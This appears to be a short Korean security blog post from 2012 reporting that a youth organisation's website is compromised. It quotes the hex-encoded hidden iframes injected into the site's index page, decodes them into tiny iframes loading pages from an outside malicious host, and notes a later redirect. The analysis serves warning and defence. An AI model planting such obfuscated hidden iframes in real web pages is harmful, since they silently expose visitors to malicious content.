posted by Kwan's 2012. 6. 3. 15:26

감염 사이트 : http://www.jeonju1318.or.kr 

* 위 사이트는 현재도 감염중에 있습니다! 


http://www.jeonju1318.or.kr/root/index.php 

안에 현재 악성 스크립트가 존재하여서 글을 써 봅니다!


현재 감염된 페이니 내에 ! 이렇게 Hex 코드로 위장하여 Iframe이 삽입되었습니다! 


src=&#x68;&#x74;&#x74;&#x70;&#x3A;&#x2F;&#x2F;&#x61;&#x70;&#x70;&#x6C;&#x65;&#x2E;&#x63;&#x68;&#x6F;&#x6C;&#x2E;(중략);&#x6C; width=2 height=2></iframe><iframe src=&#x68;&#x74;&#x74;&#x70;&#x3A;&#x2F;&#x2F;&#x61;&#x70;&#x70;&#x6C;&#x65;&#x2E;&#x63;&#x68;&#x6F;&#x6C;&#x2E;&#x63; (중략) ; width=2 height=2></iframe><iframe src=&#x68;&#x74;&#x74;&#x70;&#x3A;&#x2F;&#x2F;&#x61;&#x70;&#x70;&#x6C;&#x65;&#x2E;&#x63;&#x68;&#x6F;&#x6C;&#x2E;&#x63;&#x6F; (중략) ; width=2 height=2></iframe><iframe src=&#x68;&#x74;&#x74;&#x70;&#x3A;&#x2F;&#x2F;&#x61;&#x70;&#x70;&#x6C;&#x65;&#x2E;&#x

63;&#x68;&#x6F;&#x6C;&#x2E;&#x63;&#x6F; (중략) C; width=2 


간단하게 Docode Hex 를 해주면 제대로 된 Iframe 를 보실 수 있습니다!


http://apple.chox.com/xml/index.html width=2 height=2></iframe>

<iframe src=http://apple.chox.com/xml/index.html width=2 height=2></iframe>

<iframe src=http://apple.chox.com/xml/index.html width=2 height=2></iframe>

<iframe src=http://apple.chox.com/xml/index.html


현재 페이지는 사라졌으며! 다시 페이지가 http://www.test.ccc Redirection 되고 있습니다!


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">

<html><head>

<title>302 Found</title>

</head><body>

<h1>Found</h1>

<p>The document has moved <a href="http://www.test.ccc">here</a>.</p>

</body></html>


http://www.test.ccc

=========================

Server IP(s):

0.0.0.0

=========================


댓글을 달아 주세요